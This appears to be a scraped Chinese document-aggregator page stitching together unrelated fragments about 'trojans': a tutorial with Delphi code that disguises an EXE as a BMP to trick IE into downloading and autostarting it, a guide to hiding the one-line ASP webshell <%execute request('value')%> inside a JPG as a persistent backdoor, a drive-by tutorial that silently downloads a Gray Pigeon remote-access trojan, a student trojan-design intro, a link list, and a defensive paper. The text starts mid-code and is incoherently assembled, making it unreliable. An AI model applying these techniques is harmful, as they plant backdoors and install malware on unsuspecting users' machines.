col:=col+4; end else Break;

制作图片木马教程(如何制作图片木马)

何谓BMP网页木马?它和过去早就用臭了的MIME头漏洞的木马不同,MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件,放到网页上利用IE和OE的编码漏洞实现自动下载和执行。 然而BMP木马就不同,它把一个EXE文件伪装成一个BMP图片文件,欺骗IE自动下载,再利用网页中的JAVASCRIPT脚本查找客户端的Internet临时文件夹,找到下载后的BMP文件,把它拷贝到TEMP目录。再编写一个脚本把找到的BMP 文件用DEBUG还原成EXE,并把它放到注册表启动项中,在下一次开机时执行.但是这种技术只能在9X下发挥作用,对于2K、XP来说是无能为力了。 看上去好象很复杂,下面我们一步一步来: 1) EXE变BMP的方法 大家自己去查查BMP文件资料就会知道,BMP文件的文件头有54个字节,简单来说里面包含了BMP文件的长宽、位数、文件大小、数据区长度。我们只要在EXE文件的文件头前面添加相应的BMP文件头(当然BMP文件头里面的数据要符合EXE文件的大小啦),这样就可以欺骗IE下载该BMP文件,开始我们用JPG 文件做过试验,发现如果文件头不正确的话,是不会下载的,转换代码如下:

FindFirstFile(Pchar(ParamStr(1)),fd); fs:=fd.nFileSizeLow; col := 4; while true do begin if (fs mod 12)=0 then begin len:=fs; end else len:=fs+12-(fs mod 12); row := len div col div 3; if row>col then begin col:=col+4; end else Break; end; FillChar(buffer,256,0); {一下为BMP文件头数据} Buffer[0]:='B';Buffer[1]:='M'; PDWORD(@buffer[18])^:=col; PDWORD(@buffer[22])^:=row; PDWORD(@buffer[34])^:=len; PDWORD(@buffer[2])^:=len+54; PDWORD(@buffer[10])^:=54; PDWORD(@buffer[14])^:=40; PWORD(@buffer[26])^:=1;

一个简单木马程序的设计与开发.

一个简单木马程序的设计与开发 1 前言 1.1 课题背景随着互联网技术的迅猛发展,网络给人们带来了很多便利,但是也带来了许多麻烦。各种网页木马,后门,下载者,病毒,利用各种系统漏洞,网站漏洞,程序漏洞,邮箱漏洞,U 盘及社会工程学等在网上横行,给广大用户带来了重要资料丢失,机密文件提前泄密,邮箱帐号,游戏帐号,各类照片被人恶意修改后传播到网上,系统被格盘,系统被监视,摄像头被人暗中开启并录像传播等非常严重的后果。使得许多朋友,闻木马,就变色。为了使更多朋友了解木马病毒,通过编写一个简单的木马,来分析它及其的变形,提出相应的防范措施。 1. 2 国内外研究现状从有关的资料看,国内外的windows系统下的木马,功能已经从简单发展到全面,大致包括以下功能:上传下载文件,删除文件,复制文件,粘贴文件,文件编辑,文件重命名,文件剪切,新建文件,修改文件,修改文件的创建时间等;获得目标主机名,IP地址,以及目标主机地理位置,系统打了多少补丁,安装了些什么软件,MAC地址,安装了几个处理器,内存多大,网速多快,系统启动时间,系统目录,系统版本等;取得目标主机的CMD权限,添加系统管理员,对目标主机进行注册表操作,开启目标主机3389端口,软件自动更新,使目标主机成为HTTP,SOCK5代理服务器,对目标主机的服务进行操作,对目标主机的开机自启动项进行操作,目标主机主动向控制端发起连接,也可主动向目标主机发起连接等,暗中打开用户摄像头,监控,录制用户隐私生活,对用户进行屏幕监控等。木马的隐蔽性更强了,从原来的单纯隐藏在某个目录中,发展到了替换系统文件,修改文件修改时间等。木马从EXE文件靠注册表启动,发展到了DLL文件远程线程插入,替换修改系统DLL文件,靠驱动文件等高级水准,更有写入系统核心中的。木马深藏在系统中,甚至在许多杀毒软件启动前启动,或者是绑定到杀毒软件上,或者修改杀毒软件规则,使得杀毒软件误以为它是合法文件,或者是将木马DLL文件插入到WINLOGON.EXE 中,以至于在安全模式下也无法删除。有的病毒会在系统部分盘中,创建Autorun.inf文件,然后把病毒也复制到该目录下隐藏着,使得用户双击该盘时,运行该病毒,对此,某些用户格式化了系统盘再重装系统,也无法删除它。更有木马,病毒会感染某些盘中的EXE文件,COM文件,使得用户重装系统后,运行该文件后又运行病毒。木马中招的方式包括:访问不安全网站,访问某些被入侵后的安全网站,在不同机子上使用U盘,通过U盘传播的木马病毒也越来越多,对系统或是一般程序进行溢出后,上传木马,对网络中的主机进行漏洞扫描,然后利用相关漏洞自动传播,利用邮箱漏洞配合网页木马,使用户中招,直接通过QQ等聊天软件传给用户,并叫其运行,在QQ等聊天软件中发布网址给好友,好友不知情下点击中招,通过物理接触主机以及远程破解主机密码等手段中招。木门在被杀毒软件查杀后,一般马上就会有变种或是升级版本流传,通过对木马进行加壳,修改木马特征码,修改程序等手段使木马免杀。木马还包括ASP和PHP以及ASPX,JSP木马,它们能过网页的形式存在,也可以有很多功能,如常见的ASP木马就有如下功能:登录验证,上传下载文件,删除,复制,移动,编辑文件,新建文件,新建目录,搜索文件,更改文件名,查看文件修改时间,serv_u漏洞提权,查看服务器信息,查看环境变量,注册表操作,探查网站是否支持PHP,查找网站上已经存在的木马,包括已经加密后的,对服务器上所有盘的文件操作,对数据库进行操作,对网站

●如何制作网页中木马设置电脑的各种属性

●如何制作网页 ●教你建一个别人打不开的文件夹 ●XP系统如何加快开机速度 ●在电脑右下角显示你的名字 ●只改一个值!马上加快宽带上网速度 ●语音找歌!对着电脑哼两句就能帮你找到这首歌●部分网站打不开如何处理? ●网页特效收藏 ●防止QQ密码被盗的五个绝招 ●“网页上有错误”的解决方法 ●在IE上显示自己的名字 ●轻松五招!查出你想要知道的IP地址 ●电脑的开机密码忘记了怎么打开 ●部分网站打不开如何处理? ●教你破解40位加密密码的方法 ●轻松破解WMV格式电影的许可证 ●软件卸载难?高手教你解决 ●小方法教你吓走要动你电脑的人 ●妙计:如何破解网页文字防复制 ●网页特效收藏 ●教你把千千静听变成在线收音机 ●推荐几个免费图片上传空间 ●让你的摄像头变成文字扫描器 ●破解禁用鼠标右键方法 ●用小软件轻松申请到QQ靓号 ●十招让你学会破解软件 ●教你免费玩收费的手机彩铃和游戏 ●上网时遇到恶意网页时的处理办法 ●教你准确查找对方的IP地址 ●电脑的属性设置 ●电脑使用技巧大全 ●使用电脑小巧门 ●Windows 技巧全集大放送 ●Windows XP系统默认设置需注意7个安全问题●注册表大全 ●破解网页文字无法复制的方法 ●装机软件集合(注册、破解版) ●常遇电脑故障应急处理方法 ●如何不让别人乱动你的电脑上软件 ●电脑故障以及解决百科全书 ●回收站无法清空问题解决方案 ●Windows 罕见技巧全集 ●木马病毒的通用解法

●在Windows XP中制作屏保 ●word有这么多简便的使用方法 ●怎么找回回收站里已经删除的文件? ●Windows XP鲜为人知的70招 ●拯救硬盘十大绝招 ●电脑的属性设置 ●木马隐藏地点全搜查 ●硬盘数据恢复参考文章 ●隐藏文件四大绝招 ●Word 新建文档的惊人发现 ●不用重装、还原、优化,让你的系统比重装还爽●我的文档一些不为人知的应用 ●电脑各种错误信息的中文意思 ●绝对有用的20条电脑使用超级技巧 ●高手新手都适用的137个技巧 ●键盘上每个键的作用 ●教你怎样抓图 ●释放C盘空间的技巧 ●一键恢复及重装系统步骤 ●帮你把电脑调到最佳状态 ●电脑问题解答 ●电脑高手常用的组合键 ●了解密码破解原理,确保QQ相册安全 ●电脑小技巧70个 ●四个你不知道的QQ绝密技巧! ●介绍用QQ看电视的方法 ●用最简单的方法让QQ上的好友露出原形 ●QQ使用的七大非常规秘籍 ●看完这些,你就是电脑高手了 ●XP扮靓进行时文件夹颜色随心换 ●电脑常用密码破解 ●保护隐私:Windows八大保密技巧 ●Windows操作系统快速关机之谜 ●恢复丢失数据的方法 ●连接宽带时出错表示的意思 ●电脑高手应用技巧荟萃 ●想让你的电脑键盘说话吗? ●鲜为人知的ESC键妙用法 ●教你读懂电脑系统 ●如何去删除对方qq中的自己 ●QQ不为人知的使用技巧 ●快速打开网页的几种方法 ●XP怎样节省内存,加快开机速度 ●电脑命令一览表

一句话木马图片制作(三种方法)

图片木马制作的三种方法 Copy命令制作 1.asp内容: 打开cmd,数据一下命令: 此时打开两个jpg文件,相比: 且打开2.jpg可以像1.jpg一样显示图像。 把以下代码放入目标网站,即可按asp执行。 <% #include files=”2.jpg”%> Uedit32(转载): 本制作来自于:雪糕。 我们通常在得到webshell之后都想给自己留个后门,等下次或以后有用得到的时候再进来看看。但如果直接加入一句话木马<%execute request("value")%>到asp文件中时,在该页面上就会有类似如下的错误: Microsoft VBScript 运行时错误错误'800a000d' 类型不匹配: 'execute' /news1/show.asp,行 3 所以我们就可以开动脑筋了,使用插入一句话木马的图片做我们的后门。而且我们如果有足够的权限的话(希望网站中的文件可写),就直接把网站原有的图片变成后门,然后在那个asp文件中加入调用图片后门的代码: 这样就没有上面的“类型不匹配: 'execute'”错误了,而且也更好的隐藏了我们的后门。 新挑战始终会伴着新事物的出现而出现,当我们直接将我们的一句话木马的asp文件改成jpg 或gif文件的时候,这个图片文件是打不开的,这又容易被管理员发现。然后我们就又开始思考并寻找新的方法:制作可以显示图片内容的图片格式后门。 制作步骤: 一、前期准备 材料: 1.一张图片:1.jpg 2.一句话木马服务器端代码: <%execute request("value")%>(其他的一句话也行) 3.一句Script标签: 4. 调用图片后门代码: 工具:UltraEdit 二、开始制作: 1.使用UltraEdit打开1.jpg文件,然后按CTRL +F 进行查找图片中的“<%”和“%>” 其中<%的十六进制代码是3E 25,那么%>就应该是25 3E,但是我们只把25改成00;

网页木马制作全过程(详细)

网页木马制作全过程(详细) 如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。这是我一黑客朋友给我说的一句说。打开该网站的首页,经检查,我确实中了灰鸽子。怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一些不怀好意者精心制作的网页木马。 以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马的攻击原理说起。 一、网页木马的攻击原理 首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。 有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。 ⒈自动下载程序 小提示:代码说明 a. 代码中“src”的属性为程序的网络地址,本例中“https://www.360docs.net/doc/ae8640321.html,/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。 b. 也可以把木马程序上传到免费的主页空间上去,但免费空间出于安全的考虑,多数不允许上传exe 文件,黑客可能变通一下把扩展名exe改为bat或com,这样他们就可以把这些程序上传到服务器上了。 把这段代码插入到网页源代码的…之间(如图1),然后用没打补丁的IE6打开,接下来,打开IE的临时目录,你会发现,在该文件夹中有一个“1.exe”文件,这也就是说,该网页已自动下载了我放置在Web服务器上的灰鸽子木马。

windows平台下ASP网站被挂马的原因及防范的研究

windows 平台下网站被挂马的原因与对策防范的研究 牟红睿 (新疆天业集团,新疆石河子 742500) 摘要:随着网络技术的不断发展,网络上的各种攻击技术也越来越隐密,方法更加多样化。网页挂马就是常用的攻击方式之一,本文通过分析网页中挂马的原理、类型及方式,以及网页挂马的原因,经过大量实践研究总结出服务器和客户端各种网页挂马的检测方法及防范对策。 关键字:网站挂马;原因;检测方法;防范对策; 随着计算机网络技术的不断发展,互联网安全形势也逐渐严峻,网络上的各种攻击手段也在变得越来越隐秘,方法也更多样化。根据《瑞星2012年中国信息安全综合报告》,2012年1至12月瑞星“云安全”系统截获挂马网站516万个网页,比2011年同期增加了48.7%[1]。网页挂马不仅对网站的安全运行造成威胁,而且对于用户来说,有可能造成个人信息泄露、各种账户及密码被窃取等严重恶劣影响。 1.网页挂马的原理 网站挂马又称之为网页隐藏式恶意连结,就是攻击者在正常的页面中插入一段伪代码,当浏览该网页时,这段代码就会被执行,同时下载并运行所调用的木马服务器端程序,进而控制浏览者的主机,以便对用户实施各种攻击[2]。作为网页挂马的散布者,其目的是将木马下载到用户本地,并进一步执行,当木马获得执行之后,就意味着会有更多的木马被下载,进一步被执行,进入一个恶性的循环,从而使用户的电脑遭到攻击和控制。 2.网页挂木马的过程及挂马方法 网页挂马实际上一个html 网页而已,但它与其它网页不通的是该网页是经过精心制作的。当用户访问该网页时就会中木马,这些网页利用了浏览器漏洞或者操作系统漏洞等,让浏览器在后台自动下载指定位置的木马并安装或直接运行。这些过程都在后台运行,用户很难察觉的到。挂马只是一种手段,其目的是将木马传播出去。以远程控制为目的的木马,是为了得到大量的肉鸡,以此对某些网站实施控制和修改。以获取信息为目的的木马,是为了获取各种账号信息。 2.1网站挂马攻击过程 (1)将准备好的木马程序上传到申请的空间中,运行木马生成器,在“木马地址”中填入已经上传到空间中的木马网址,然后点击“生成网马”按钮,即可在程序的同目录生成一个网页木马。运行网马加密软件,在“欲加密的网页”中浏览选中生成的网页木马对其进行加密,最后将其上传到网页空间中,并保证和空间中的木马程序位于同一目录中。(2)黑客利用工具软件搜索有脚本缺陷或漏洞的网站进行入侵,得到网站的webshell ,然后利用各种挂马方式编辑网站首页的内容,插入相应的挂马代码。(3)当网站的浏览者浏览该网站时,浏览者点击某个连接或者浏览某个页面,就会转引到黑客预先设计好的木马连接陷阱。(4) 浏览者在不知情的情况下,本地图 2利用木马攻击过程

相关文档
最新文档